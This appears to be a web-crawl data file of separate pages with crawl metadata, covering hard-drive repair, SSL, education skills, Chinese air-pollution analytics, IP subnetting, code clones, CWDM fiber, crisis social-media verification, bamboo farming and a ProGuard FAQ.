in our parts inventory that we can take donor heads from. The more parts we have in our inventory the more likely it is that we will find heads that closely resemble the heads we are looking to replace.Second, we have sophisticated techniques for tricking the patient drive (the drive from which we want to recover data) into accepting the heads form the donor drive. As we have already covered, just because we have a drive of the same make and model does not mean that the drive will accept and operate with the new donor heads.Just like the human body can reject a new organ, a hard drive can reject new components. Doctors get around this by administering anti-rejection drugs to the patient. Gillware can’t use drugs, but we CAN manipulate the hard drive’s firmware to accept the new parts. It may not like it and the performance will certainly be degraded, but when executed properly, data can be read and recovered. - Damage to other components: If in the process of the heads failing there is damage to other parts of the drive (platter damage, electrical failures, motor failure) recovery can be made even more difficult. Especially in the case of platter damage, unless the damage is cleaned up or repaired, the replacement donor heads will inevitably meet the same fate as the original heads. They will be instantly killed. - Risk of contaminants on platters: This is something to consider any time a hard drive is opened. Since the heads float just a few nanometers above the surface of the platters, even a single speck of dust or a fingerprint on the platters can have catastrophic results. Any invasive mechanical data recovery should be performed by reputable professionals in a dust-free ISO 5, Class 100 cleanroom facility. To learn more… In the posts to come, you’ll learn more about the different hard drive components we discussed in this post (electrical components, firmware and spindle motor) and how they work together to create a fully functioning hard drive. Additionally, we’ll show you what can go wrong with each of these components and how Gillware recovers data from different situations of hard drive failure. Check out the videos below showing how the read/write heads work in action. The videos show the read/write heads performing random reads inside a hard drive with the cover removed.
<urn:uuid:cd6ef01e-e317-48fb-a071-7b2a926d4fc7>
CC-MAIN-2017-04
https://www.gillware.com/blog/data-recovery/data-recovery-101-readwrite-head-assembly/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280242.65/warc/CC-MAIN-20170116095120-00338-ip-10-171-10-70.ec2.internal.warc.gz
en
0.942753
1,486
3.828125
4
The Internet was created with the best human aspirations in mind. From its nascent and humble beginnings, the intention of the Internet was to create point-to-point communications linking people and machines at light speed. The value of knowledge increases when shared. However, as it is with well-intentioned human aspirations, the darker aspirations soon follow. Communications do not get a free pass. In the 21st century, perhaps before, nation-states initiated advanced persistent threat, distributed denial-of-service (DDoS) and other cyber-attacks with the intention of crippling or destroying services. Therefore, the fruition of the Internet cannot exist without trusted point-to-point communications. The foundation of trusted Internet communications are Secure Socket Link (SSL) certificates, an encryption technology installed on Web servers that permits transmission of sensitive data through an encrypted connection. Using a public-key infrastructure (PKI), SSL certificates authenticate the end-use website and the endpoint server, making it difficult for those sites to be imitated or forged. SSL certificates are purchased from companies known as certificate authorities (CAs). Download this white paper to get insight on how to: - Manage an SSL certification throughout the entire life cycle of a certificate - Keep your website secure with as little friction for the organization as possible
<urn:uuid:f2efed12-6a3d-42e5-8932-de3490622408>
CC-MAIN-2017-04
https://www.infosecurity-magazine.com/white-papers/six-golden-rules-ssl-or-tls/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281263.12/warc/CC-MAIN-20170116095121-00062-ip-10-171-10-70.ec2.internal.warc.gz
en
0.936216
263
3.09375
3
21st century skills have been a hot topic in the world of education, and there is an overwhelming amount of 21st century skill information on the web. However, it’s not easy for every education professional to absorb what it means to them and their district. - The world is more connected, flatter, and moving faster. Technology evolution, a maturing world economy, dynamic teaming and collaboration. Windows of opportunity are getting smaller as news flows faster. Reaction time is a critical differentiator. - Information is growing rapidly – and all can contribute. Information is exploding – but some is accurate, some is not, some are opinions, some are lies, some are personal expressions. Information in the new world is not static – it is interactive and dynamic. So based on these changes, what are the new and growing skills required in the 21st century? For the benefit of my own school district – and anyone trying to get their arms around the fundamentals – I’ve narrowed the list to seven key skills: - Information Literacy: Navigating, interpreting and effectively using the explosion of information available to us is critical in the 21st century. - Media Literacy: IM streams, blogs, streaming video, web conferences – information is being channeled through ever-changing media. The ability to navigate and interpret those media in context, as well as the ability to use those media effectively to communicate are critical skills. - Information Technology Literacy: The tools that we use to create or access media that contain information are constantly evolving. Understanding exactly which tools to use, and when, in a constantly evolving tools environment is a critical skill. - Global Literacy: The world is more connected, and insularity is not an option. Awareness, social and cross-cultural skills are valuable. - Flexibility & Adaptability: The world has always been changing, but change happens – and is communicated – faster. Agility is critical in the 21st century. - High-Level Knowledge Skills: In a flat world, lower-level skills are a commodity. Critical thinking, problem-solving, creativity and innovation are valuable. - Communication & Collaboration: A connected world requires better communication skills, and the ability to dynamically team to accomplish tasks. Want to dive deeper? I’d recommend the Partnership for 21st Century Skills. And my colleague Daryl Plummer’s post on 20th century thinking. And, of course, my own thoughts on the impact of the web, social software and cloud computing on education. Good luck, and I’d love comments! Comments or opinions expressed on this blog are those of the individual contributors only, and do not necessarily represent the views of Gartner, Inc. or its management. Readers may copy and redistribute blog postings on other blogs, or otherwise for private, non-commercial or journalistic purposes, with attribution to Gartner. This content may not be used for any other purposes in any other formats or media. The content on this blog is provided on an "as-is" basis. Gartner shall not be liable for any damages whatsoever arising out of the content or use of this blog.
<urn:uuid:5e28bf41-276c-449c-978a-5d9ace5de9b5>
CC-MAIN-2017-04
http://blogs.gartner.com/thomas_bittman/2009/01/30/21st-century-skills-for-dummies/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280723.5/warc/CC-MAIN-20170116095120-00090-ip-10-171-10-70.ec2.internal.warc.gz
en
0.913405
653
3.078125
3
Analytics Tools Help China Deal With Air PollutionBy Samuel Greengard | Posted 2014-08-15 Email Print The Chinese government is taking steps to deal effectively with the country's growing air pollution problem by deploying advanced analytics and other tech tools. As China has grown into a global economic powerhouse, air pollution has become a major health problem. Smog in major urban areas such as Beijing has worsened in recent years, and it now reaches hazardous levels on a regular basis. As a result, Prime Minister Li Keqiang declared war on pollution last March, and the country has announced that it will work with regional and local officials that do not address the issue adequately. Yet, China is turning to more than political discourse and new policies to address its air pollution problem. In July, the Chinese government inked a 10-year deal with IBM to embark on an initiative dubbed "Green Horizon." Its goal is to boost renewable energy and improve energy optimization, while putting systems and data to work in order to better understand the underlying sources of pollution and the steps required to address the challenge. The need to clear the air is apparent to a wide range of observers, including researchers. "China's rapid economic development has introduced heavy environmental costs," states Tao Wang, resident scholar in the Energy and Climate Program at Carnegie-Tsinghua Center for Global Policy. "As the general public demands a better environment and improved quality of life, it is important for the government to respond and adopt a more sustainable approach to economic development." IBM's China Research Laboratory will spearhead the effort and tap into a network of 12 global research labs to create an ecosystem of partners from across government, academia, industry and private enterprise. Green Horizon will rely on advanced technologies and computing methods—including weather satellites, next-generation optical sensors, structured databases, big data analytics and the Internet of things—to gain deeper insights into weather prediction and climate modeling. Cognitive computing systems will analyze and learn from streams of real-time data. By applying supercomputing processing power, scientists from IBM and the Beijing government hope to generate visual maps at street-scale resolution showing the source and dispersion of pollutants across Beijing 72 hours in advance. "This project will provide Beijing with a much better understanding of how pollution is produced and spread across the city, so the government can address it more effectively," Wang explains. In addition to monitoring real-time data, scientists and researchers will use historical data to better "calibrate" the model, he adds. What's more, the IBM technology will overlay with the country's Airborne Pollution Prevention and Control Action Plan, which aims to safeguard the health of approximately 700 million people living in urban areas. The city of Beijing will invest more than $160 billion to improve air quality and deliver on its target of reducing harmful fine Particulate Matter (PM 2.5) by 25 percent by 2017. With accurate, real-time data about Beijing's air quality, the government will be in a position to address environmental issues rapidly by altering production at specific factories or alerting citizens about developing air quality issues. In addition, the Chinese government has established a goal of obtaining 13 percent of its consumable energy from non-fossil fuels by 2017, while enabling the construction of the world's largest renewable grid. "Science-based decision support systems combined with sophisticated data analysis are exactly what the Chinese government needs to address the country's energy and environmental issues," Wang concludes.
<urn:uuid:4db9a96d-42bb-49b9-a3aa-73f333edbf2b>
CC-MAIN-2017-04
http://www.baselinemag.com/analytics-big-data/analytics-tools-help-china-deal-with-air-pollution.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281331.15/warc/CC-MAIN-20170116095121-00484-ip-10-171-10-70.ec2.internal.warc.gz
en
0.93623
705
2.90625
3
Binary and IP Address Basics of Subnetting The process of learning how to subnet IP addresses begins with understanding binary numbers and decimal conversions along with the basic structure of IPv4 addresses. This paper focuses on the mathematics of binary numbering and IP address structure. The process of subnetting is both a mathematical process and a network design process. Mathematics drive how subnets are calculated, identified, and assigned. The network design determines how many subnets are needed and how many hosts an individual subnet needs to support based on the requirements of the organization. This paper focuses on the mathematics of binary numbering and IP address structure. It covers the following topics: 1. Construct and representation of an IPv4 address. 2. Binary numbering system. 3. Process to convert a decimal number to a binary number. 4. Process to convert a binary number to a decimal number. 5. Fundamental aspects of an IPv4 address. Note: Throughout this document, the term IP address refers to an IPv4 address. This document does not include IPv6. IP Address Construct and Representation An IP address is a thirty-two-bit binary number. The thirty two bits are separated into four groups of eight bits called octets. However, an IP address is represented as a dotted decimal number (for example: 220.127.116.11). Since an IP address is a binary number represented in dotted decimal format, an examination of the binary numbering system is needed. The Binary Numbering System Numbering systems have a base, which indicates how many unique numbers they have. For example, humans use the decimal numbering system, which is a base ten numbering system. In the decimal numbering system there are only ten base numbers-zero through nine. All other numbers are created from these ten numbers. The position of a number determines its value. For example, the number 2,534 means the following: there are two thousands; five hundreds; three tens; and four ones. The table below shows each number, its position, and the value of the position. Computers, routers, and switches use the binary numbering system. The binary numbering system is a base two numbering system, meaning there are only two base numbers-zero and one. All other numbers are created from these two numbers. Just like in the decimal numbering system, the location of the number determines its value. The table below shows the value of the first eight binary positions. For exponents above 7, double the previous place value. For example, 28 = 256, 29 = 512, 210 = 1,024, and so on. Decimal to Binary Conversion Since IP addresses are a binary number represented in dotted decimal format, it is often necessary to convert a decimal number to a binary number. In the figure above, the decimal number 35 is converted to the binary number 00100011. The steps to perform this conversion are below. 1. Determine your decimal number. In this scenario, it is 35. 2. Write out the base number and its exponent. Since an IP address uses groups of eight binary bits, eight base two exponents are listed. 3. Below the base number and its exponent, write the place value. For example, 20 has a value of 1; 22 has a value of 4; 23 has a value of 8; etc. 4. Compare the value of the decimal number to the value of the highest bit position. If the value of the highest bit position is greater than the decimal number, place a 0 below the bit position. A 0 below the bit position means that position is not used. However, if the value of the highest bit position is less than or equal to the decimal number, place a 1 below the bit position. A 1 below the bit position means that position is used.
<urn:uuid:3b1aa874-7192-4bb0-962a-c798bd5ab563>
CC-MAIN-2017-04
https://www.globalknowledge.com/ca-en/resources/resource-library/white-paper/binary-and-ip-address-basics-of-subnetting/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280308.24/warc/CC-MAIN-20170116095120-00026-ip-10-171-10-70.ec2.internal.warc.gz
en
0.898928
784
3.71875
4
The "Dollies" of Software Cloning is an easy, fast way to duplicate business functionality. However, it's also been a key factor behind the uncontrolled growth of our industrial-strength systems. Since 1965, total source code developed and maintained has risen from 3 billion lines to at least 500 billion lines. And it's estimated that clones today represent about 10% of code in many large systems. What's more, cloning is creating unmanageable complexity; especially through the dissemination of dangerous, hard-to-fix errors. Growing size and complexity, in turn, is making these legacy systems more difficult and expensive to support. As a system's size (measured in total lines of code) increases, so does the number of professionals needed to maintain it. The average software professional already manages about 100,000 lines of code, and the burden of managing clones will only add to the workload. This spells big potential costs and productivity issues over the long term. After all, software maintenance represents more than 80% of total cost of ownership (TCO) during the life of a system, and the supply of software professionals is limited. For a worst-case cloning scenario, consider a massive transportation-industry system that crashed in 2004. After analyzing the system, I discovered that one reason for the failure was overwhelming software complexity that had developed over decades. The system contained more than 4,000 programs and 1.24 million lines of code, with perhaps 100,000 of them cloned. This was the perfect setup for further outtages and business disruptions. The lesson? We must simplify such systems now. Detecting, analyzing and removing the clones are the essential first steps. Together, these steps set the stage for success with subsequent legacy modernization activities as we continue progressing through this "modernization decade." Automatic clone detection techniques are especially valuable since they maximize cost savings and programmer productivity over the software maintenance life cycle. Here are five automatic clone detection techniques commonly used today: Using the text-based method on a 40,000-line COBOL system, researchers found 25% of the lines of code were cloned. The abstract syntax tree method revealed 12.7% cloned lines in a 400,000-line C-language system. The potential in that case -- 50,000 fewer lines to maintain, along with the substantial long-term cost savings -- is intriguing, indeed. Analyzing and Removing But automatically detecting clones is only the crucial first step in legacy system modernization. We must then analyze the clones by visualizing where they occur across the system in question. Graphical tools such as ones that display "clone pairs" as diagonal lines on a grid are useful here. Removing clones is the ultimate goal, of course. The process of removing code, which does not alter program functionality, is called generalizing, refactoring or restructuring. Today's agile development methodologies include two approaches for removing clones. The extract method extracts a fragment of code from multiple instances and redefines it as a new method or function. In the pull-up method, child methods are pulled up to a parent method. These approaches are primarily manual. But a tool called Cancer (part of the CCFinder toolset developed by Toshihiro Kamiya) shows promising results in automating them. Fully automated clone removal will prove to be a great time-saver for our software maintenance organizations. It's time to take the first steps to successful legacy modernization. Clone detection, analysis and removal will significantly reduce the costs and complexity of our large, aging, business-critical systems. Tom Hill, who became an EDS Fellow in 1991, is head of EDS' research and development (R&D) for the second time in his 30-year EDS career.
<urn:uuid:279a23a0-4c4c-49da-9a07-18e4833f4e0f>
CC-MAIN-2017-04
http://www.cioupdate.com/print/trends/article.php/3507766/The-Dollies-of-Software.htm
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280730.27/warc/CC-MAIN-20170116095120-00512-ip-10-171-10-70.ec2.internal.warc.gz
en
0.939067
780
2.546875
3
This method combines at least two signals at different wavelengths for transmission along one fiber-optic cable. CWDM uses fewer channels than DWDM, but more than standard WDM. In 2002, a 20-nm channel spacing grid was standardized by ITU (ITU-T G.694.2) ranging from 1270 to 1610 nm. However, since wideband optical amplification is not available, this limits the optical spans to several tens of kilometers. CWDM is a cost-effective option for increasing mobile backhaul bandwidth, but it does come with some network characterization and deployment challenges, including a limited maximum distance. However, a major advantage is that it can be easily overlaid on existing infrastructure. The most basic configuration is based on a single fiber pair, where one fiber is used to transmit and the other to receive. This configuration often delivers eight wavelengths from 1471 nm to 1611 nm. However, networks are now deploying in the O-band, which doubles the capacity to 16 wavelengths (1271 nm to 1451 nm), excluding the 1371 nm and 1391 nm water peak wavelengths. CWDM architecture is only comprised of passive components, namely multiplexers and demultiplexers; no amplifiers are used. This means there is no amplification, and therefore, no noise. The main advantage of this is that there is no need to measure the optical signal-to-noise ratio. Upon activation, barring improper fiber characterization, only the following elements can prevent proper transmission: - Transmitter failure - Sudden change in the loss created in an OADM - Human error (e.g., connection to the wrong port or splicing to the wrong filter port) Links can be tested end-to-end and fully characterized with a specialized CWDM OTDR. Thanks to its CWDM-tuned wavelengths, this tool will drop each test wavelength at the corresponding point on the network (e.g., customer premises, cell tower, etc. This means that each part of the network can be characterized at the head-end, which will save time and avoid travelling to hard-to-get-to sites. Once the wavelength is active, a channel analyzer must be used at the customer premises or cell tower to validate that it is present and that the power level received is within budget. This OTDR and channel analyzer combo is also useful when a single customer is experiencing issues. If the channel analyzer cannot confirm that the channel is present and within power budget, the CWDM OTDR can be used to test at either a specific or out-of-band wavelength to detect issues. The advantage of using an out-of-band wavelength (1650 nm) is that the OADM will filter it out.
<urn:uuid:cae52873-15fb-4107-80dc-122423b36b66>
CC-MAIN-2017-04
http://exfo.com/glossary/coarse-wavelength-division-multiplexing-cwdm
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560284429.99/warc/CC-MAIN-20170116095124-00144-ip-10-171-10-70.ec2.internal.warc.gz
en
0.9361
581
3.390625
3
This article is the fourth installment in Orlando's series on virtual operations support teams (VOSTs). The first installment, Lessons Learned From The Social Media Tabletop Exercise, is available here. The second installment, Structured Networks & Self-Coordinated Disaster Response, is available here. The third installment, Harnessing The Wisdom Of Crowds, is available here. Crisis Information From Social Media In recent months, a lot of coverage has been dedicated to instances of misinformation on social media during a crisis. In particular, Shashank Tripathi, the campaign manager for a State Senatorial candidate in New York, Tweeted politically motivated misinformation about Hurricane Sandy. His candidate got creamed in the election, by the way. These reports might lead some to think that social media should not be used to gather information during a crisis, but this would be a mistake for a number of reasons: - No source is infallible. Mass media outlets routinely get it wrong. Tripathi’s false claims were immediately questioned on Twitter, but were spread by the mass media. Similarly, mass media spread a number of false reports during the Sandy Hook incident, and even official reports routinely get information wrong. - No information is also bad. As Patrick Meier put it, “False information can cost lives. But no information can also cost lives, especially in a crisis zone. Indeed, information is perishable so the potential value of information must be weighed against the urgency of the situation. Correct information that arrives too late is useless.” - Social media can correct false information from other sources: Jeanette Sutton demonstrated that crises breed a network of fact-checkers who crop up around the world and patrol social networks to correct misinformation provided by social media, the mass media and official reports. In one case they corrected misinformation about the Tennessee Coal Pond disaster that was provided by official sources, leading those sources to retract the claims. - Social media tends to self-correct: Study after study, including one carried out by the Defense Advanced Resource Projects Agency, demonstrates that social networks of all varieties tend to self-correct for misinformation. As one commentator put it: "A redeeming feature of Twitter is the relative speed with which its users manage to sniff out and debunk the most widely circulated falsehoods. On Friday, for instance, word that the media had fingered the wrong suspect was circulating on Twitter while TV networks were still running with the false reports. The New Yorker's Sasha Frere-Jones has called the site a "self-cleaning oven." In Sandy's wake, Buzzfeed's John Hermann declared it a "truth machine."" While cynics assume that social media must amplify false reports, research proves the opposite. A study of over 4,700,000 tweets related to the earthquake in Chile found that: “About 95% of tweets related to confirmed reports validated that information. In contrast only 0.03% of tweets denied the validity of these true cases.….[Meanwhile], about 50% of tweets will deny the validity of false reports.” Most people are not trying to mislead during a disaster, and the vast majority of good intentions will drown out the small number of bad intentions. - Social media provides more information: Both official and mass media accounts by necessity summarize information, causing the loss of valuable detail. If you live near a wildfire, you are less interested in the total number of acres burned than where the fire is in relation to your street. That’s why crowdmapping has become such a valuable tool for disaster response -- it preserves the millions of details about the contours of the situation that are critical to decision-making. - We are already doing it: Patrick Meier points out that emergency responders already crowdsource information through 911. Responders do not even worry about verifying the information from a 911 call before responding, they just go. Social media analytics is 911 writ large, with the added ability to gather much more information and do verification on that information, as we will see below. While a number of commentators have focused on the question of how to verify information from social media, the considerations above show that the question is also “How to use social media to verify information from all sources -- social media, mass media, official, etc.?” Imagine that you are a fire chief with 20 firefighters positioned along a ridge fighting a wildfire. One official source reports that they are not in harm’s way, but suddenly you are flooded with hundreds of independent reports from citizens claiming to see that the fire has circled around and threatens to engulf your firefighters. What would you do? In fact, the real question is “How to gather, authenticate, and integrate information from a variety of sources -- citizen, mass media, official, etc. -- to develop situational awareness?” This is the major new task of disaster managers, and the virtual operations support team (VOST) has arisen to do just that. We will learn how to set up and run a VOST in the pre-conference workshop at the 11th Annual Continuity Insights Management Conference in April, 2013. See http://www.cimanagementconference.com/pre-post-conference-workshops for more information. More importantly, we will learn how to gather and authenticate information from a variety of sources during an incident. A host of research is emerging on how to authenticate information from different sources during a disaster, and we will apply these findings to a real crisis that is occurring somewhere in the world during the workshop. Participants will practice gathering information from a variety of sources, applying verification criteria, categorizing and aggregating the information, and then evaluating it to form a picture of the situation. This will not only provide participants with experience using the tools, but also experience in verification techniques that they would apply to their own crisis management. Verifying techniques fall into two categories: reliability of source and outside confirmation. Within them are principles developed from a variety of studies and real-life applications. For instance, the Standby Taskforce is a 700 person group of volunteers from around the world who assist the United Nations in responding to events by gathering, organizing and verifying information from a variety of sources, including social media. They have developed fairly sophisticated principles and procedures for judging the credibility of information. We will use many of these principles in our own mock VOST. These principles include: - Location of the source: Eye witness or far away? Is it a retweet or original? - Type of source: Journalist, ordinary citizen, diplomat, etc? - Language used: URL’s provided, positive vs. negative language, profanity, adjectives, grammar, etc. - Quantity of information on the source: The Standby Taskforce asks questions such as “Does the source provide a name, picture, bio and any links to their own blog, identify, profession … does searching for this name on Google provide clues to the person’s identify? Perhaps a Facebook page, a professional email address, a LinkedIn profile?” - Followers: How many followers does the source have? Are the followers in the affected area, indicating a relation to the scene (and thus care for those who are reading the information, making it more likely to be genuine)? How many people does the source follow? What type of people are they? - Timing of the information: Is the information in real-time or delayed, and is the timing suspicious? - Provides visual evidence: Is there a photo or video accompanying the report that can be evaluated? Outside confirmation includes: - Number of independent reports: As I discussed in an earlier article, the independence of reports is critical to creating “the wisdom of crowds.” Many eyes independently reporting on a situation have been proven to create a highly accurate collective picture of the event. Mob mentality is created when only a few voices are heard and influence the opinions of others sequentially. Independence is a major criteria for validation. - Coherence with reports from the same area: Are other reports from the same area consistent with it? - Can others verify?: One simple crowdsourcing tool is to feed a report back into the system and ask if others can produce similar reports. A world of resources is now available to the emergency manager for gathering information about a crisis and creating a picture of unfolding events. These resources can be overwhelming to the business continuity or disaster manager, but using them simply requires training and practice. Please join us to learn how they can be applied within your organization. “Beyond Sandy Hook. Why it's OK for the media to be wrong (for a while),” Chris Seper, http://www.linkedin.com/today/post/article/20121217061430-107961-beyond-sandy-hook-why-it-s-ok-for-the-media-to-be-wrong-for-awhile “Information Forensics: Five Case Studies on How to Verify Crowdsourced Information from Social Media,” Patrick Meier, iRevolution, http://irevolution.net/2011/11/29/information-forensics-five-case-studies/ “Twittering Tennessee: Distributed Networks and Collaboration Following a Technological Disaster,” Jeanette Sutton. http://www.jeannettesutton.com DARPA Network Challenge Project Report, http://www.hsdl.org/?view&did=17522 "Building a Better Truth Machine," Will Oremus, Slate, December 14, 2012, http://www.slate.com/articles/technology/future_tense/2012/12/social_media_hoaxes_could_machine_learning_debunk_false_twitter_rumors_before.html "Analyzing the Veracity of Tweets during a Major Crisis," Patrick Meier, iRevolution, September 19, 2010, http://irevolution.net/2010/09/19/veracity-of-tweets-during-a-major-crisis The sampling of principles are drawn from a variety of sources, especially Verifying Crowdsourced Social Media Reports for Live Crisis Mapping: An Introduction to Information Forensics, Patrick Meier, iRevolution, http://irevolution.net/2011/11/29/information-forensics-five-case-studies. The quote below is also from that work.
<urn:uuid:459b3118-d6c1-4190-8128-b4ebba5438cb>
CC-MAIN-2017-04
http://www.continuityinsights.com/article/2013/01/verifying-information-social-media
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560284429.99/warc/CC-MAIN-20170116095124-00144-ip-10-171-10-70.ec2.internal.warc.gz
en
0.919137
2,164
2.53125
3
WEST PALM BEACH, FL--(Marketwired - Sep 2, 2014) - Bamboo is not only one of the fastest growing plants on the planet -- some species can grow four feet within only 24 hours, its popularity in backyards and on farms across the United States is growing just as quickly. Reasons for growing bamboo are aplenty: Farmers use it around their fields to reduce erosion and protect fields from wind. And for hobby gardeners this evergreen perennial is an attractive alternative to hedges in order to provide a screen that does not only block curious eyes, but also catches dust and other small particles. On top of that, bamboo is a perfect solution for going green: One grove of bamboo releases 35% more oxygen than a comparable stand of trees and is thus a crucial element to keep the balance of oxygen and carbon dioxide in the atmosphere. While bamboo has played a significant economic and cultural role in Asia for centuries, American growers are still learning and perfecting their growth methods for this versatile plant. Steven Blackburn, Business Development Manager in North America at Vegalab, a manufacturer of environmentally responsible and sustainable agricultural products, started his own 19-acre bamboo farm in Labelle, Florida, to learn about farming and find out whether it was possible to successfully grow this oriental plant in a Western country like the United States. It turns out it is possible. Keeping just a few rules and tricks in mind, bamboo can even thrive in a tiny backyard. Selecting the right bamboo species for the respective climate is crucial, Blackburn explains. A great bamboo for colder climates is the Yellow Groove, he advises, which will grow in Zone 5 climates and warmer. Using mulch will help to hold the water, preventing it from evaporating in warmer regions and protecting the roots in colder areas. Last but not least, using the right fertilizer will trigger bamboo to grow at a speed that no tree or hedge can compete with. Naturally Steven Blackburn was curious to try out Vegalab's fertilizing products on his farm and was thrilled about the difference in growth he could witness as a result. According to Blackburn's experience, it is best to fertilize bamboo twice a year, ideally in early spring, to encourage new growth, and a second time during the growing season, to replace nutrients that may be getting depleted. Crucial compounds that a fertilizer used on bamboo should contain are nitrogen, phosphorus and potassium. Other factors that play a role are the absorption rate and the PH balance in the soil. Vegalab offers a wide variety of all-natural fertilizers for different climates and species along with expert advice from Blackburn and his team to make sure customers select the appropriate product for their respective purpose and environment. Steven Blackburn is a successful entrepreneur and expert in the fields of organic fertilizers, pesticides and agriculture. In his role as Development Manager for Vegalab, he puts special focus on supporting sustainable farming and developing environmentally friendly products and does not shy away from getting his hands in the dirt to try products out himself. Blackburn's motivation is not higher sales numbers, but creating all-natural products that foster a healthier world and contribute to a sustainable future. With Vegalab he found a company that follows the same goals and principles, resulting in an extremely fruitful cooperation from which farmers and gardeners across the U.S. and all around the world can now benefit. Steven Blackburn Blog: http://www.StevenBlackburnVegalab.com
<urn:uuid:ce47d6c0-bb1c-4f61-8405-ac83ad7ab6f2>
CC-MAIN-2017-04
http://www.marketwired.com/press-release/bamboo-farming-steven-blackburn-offers-valuable-tips-1943271.htm
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279915.8/warc/CC-MAIN-20170116095119-00540-ip-10-171-10-70.ec2.internal.warc.gz
en
0.944467
698
2.6875
3
Test Driven Development Learn to implement test-driven development (TDD) methods by incorporating unit testing, design, refactoring, and frameworks into your workflow. Test-Driven Development (TDD) is a design engineering process that relies on a very short development cycle. A TDD approach to software development requires a thorough review of the requirements or design before any functional code is written. The development process is started by writing the test case, then the code to pass the test and then refactoring until completion. Benefits of a TDD approach to software engineering include: - Faster feedback - Higher Acceptance - Avoids scope creep and over engineering - Customer centric and iterative - Leads to modular, flexible, maintainable code This three-day course is a deep dive in to TDD that incorporates the steps that are necessary for effective implementation. You will cover unit tests, user stories, design, refactoring, frameworks, and how to apply them to existing solutions. In addition, this course explores the implications of code dependencies, fluid requirements, and early detection of issues. This is an interactive class with hands-on labs. To get the most out of this course, you are encouraged to fully participate. This course demonstrates the skills developers and teams need for building quality applications sustainably, with quality, for the life of the code base. Note: A PC or Mac is required for this class to access remote labs.
<urn:uuid:488e2be8-e379-4fa8-984e-ccac4eac1f24>
CC-MAIN-2017-04
https://www.globalknowledge.com/ca-en/course/150949/test-driven-development/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280900.71/warc/CC-MAIN-20170116095120-00264-ip-10-171-10-70.ec2.internal.warc.gz
en
0.911196
301
3.234375
3
Java source code (.java files) is typically compiled to bytecode (.class files). Bytecode is more compact than Java source code, but it may still contain a lot of unused code, especially if it includes program libraries. Shrinking programs such as ProGuard can analyze bytecode and remove unused classes, fields, and methods. The program remains functionally equivalent, including the information given in exception stack traces. By default, compiled bytecode still contains a lot of debugging information: source file names, line numbers, field names, method names, argument names, variable names, etc. This information makes it straightforward to decompile the bytecode and reverse-engineer entire programs. Sometimes, this is not desirable. Obfuscators such as ProGuard can remove the debugging information and replace all names by meaningless character sequences, making it much harder to reverse-engineer the code. It further compacts the code as a bonus. The program remains functionally equivalent, except for the class names, method names, and line numbers given in exception stack traces. When loading class files, the class loader performs some sophisticated verification of the byte code. This analysis makes sure the code can't accidentally or intentionally break out of the sandbox of the virtual machine. Java Micro Edition and Java 6 introduced split verification. This means that the JME preverifier and the Java 6 compiler add preverification information to the class files (StackMap and StackMapTable attributes, respectively), in order to simplify the actual verification step for the class loader. Class files can then be loaded faster and in a more memory-efficient way. ProGuard can perform the preverification step too, for instance allowing to retarget older class files at Java 6. Apart from removing unused classes, fields, and methods in the shrinking step, ProGuard can also perform optimizations at the bytecode level, inside and across methods. Thanks to techniques like control flow analysis, data flow analysis, partial evaluation, static single assignment, global value numbering, and liveness analysis, ProGuard can: The positive effects of these optimizations will depend on your code and on the virtual machine on which the code is executed. Simple virtual machines may benefit more than advanced virtual machines with sophisticated JIT compilers. At the very least, your bytecode may become a bit smaller. Some notable optimizations that aren't supported yet: Yes, you can. ProGuard itself is distributed under the GPL, but this doesn't affect the programs that you process. Your code remains yours, and its license can remain the same. Yes, ProGuard supports all JDKs from 1.1 up to and including 8.0. Java 2 introduced some small differences in the class file format. Java 5 added attributes for generics and for annotations. Java 6 introduced optional preverification attributes. Java 7 made preverification obligatory and introduced support for dynamic languages. Java 8 added more attributes and default methods. ProGuard handles all versions correctly. Yes. ProGuard itself runs in Java Standard Edition, but you can freely specify the run-time environment at which your programs are targeted, including Java Micro Edition. ProGuard then also performs the required preverification, producing more compact results than the traditional external preverifier. ProGuard also comes with an obfuscator plug-in for the JME Wireless Toolkit. dx compiler converts Java bytecode into the Dalvik bytecode that runs on Android devices. By preprocessing the original bytecode, ProGuard can significantly reduce the file sizes and boost the run-time performance of the code. It is distributed as part of the Android SDK. DexGuard, ProGuard's closed-source sibling for Android, offers additional optimizations and more application protection. It should. RIM's proprietary rapc compiler converts ordinary JME jar files into cod files that run on Blackberry devices. The compiler performs quite a few optimizations, but preprocessing the jar files with ProGuard can generally still reduce the final code size by a few percent. However, the rapc compiler also seems to contain some bugs. It sometimes fails on obfuscated code that is valid and accepted by other JME tools and VMs. Your mileage may therefore vary. Yes. ProGuard provides an Ant task, so that it integrates seamlessly into your Ant build process. You can still use configurations in ProGuard's own readable format. Alternatively, if you prefer XML, you can specify the equivalent XML configuration. Yes. ProGuard also provides a Gradle task, so that it integrates into your Gradle build process. You can specify configurations in ProGuard's own format or embedded in the Groovy configuration. ProGuard's jar files are also distributed as artefacts from the Maven Central repository. There are some third-party plugins that support ProGuard, such as the android-maven-plugin and the IDFC Maven ProGuard Plug-in. DexGuard also comes with a Maven plugin. Yes. First of all, ProGuard is perfectly usable as a command-line tool that can easily be integrated into any automatic build process. For casual users, there's also a graphical user interface that simplifies creating, loading, editing, executing, and saving ProGuard configurations. Yes. ProGuard automatically handles constructs like SomeClass.class. The referenced classes are preserved in the shrinking phase, and the string arguments are properly replaced in the obfuscation phase. With variable string arguments, it's generally not possible to determine their possible values. They might be read from a configuration file, for instance. However, ProGuard will note a number of constructs like" " (SomeClass)Class.forName(variable).newInstance()". These might be an indication that the class or interface SomeClass and/or its implementations may need to be preserved. The developer can adapt his configuration accordingly. Yes. ProGuard copies all non-class resource files, optionally adapting their names and their contents to the obfuscation that has been applied. No. String encryption in program code has to be perfectly reversible by definition, so it only improves the obfuscation level. It increases the footprint of the code. However, by popular demand, ProGuard's closed-source sibling for Android, DexGuard, does provide string encryption, along with more protection techniques against static and dynamic analysis. Not explicitly. Control flow obfuscation injects additional branches into the bytecode, in an attempt to fool decompilers. ProGuard does not do this, except to some 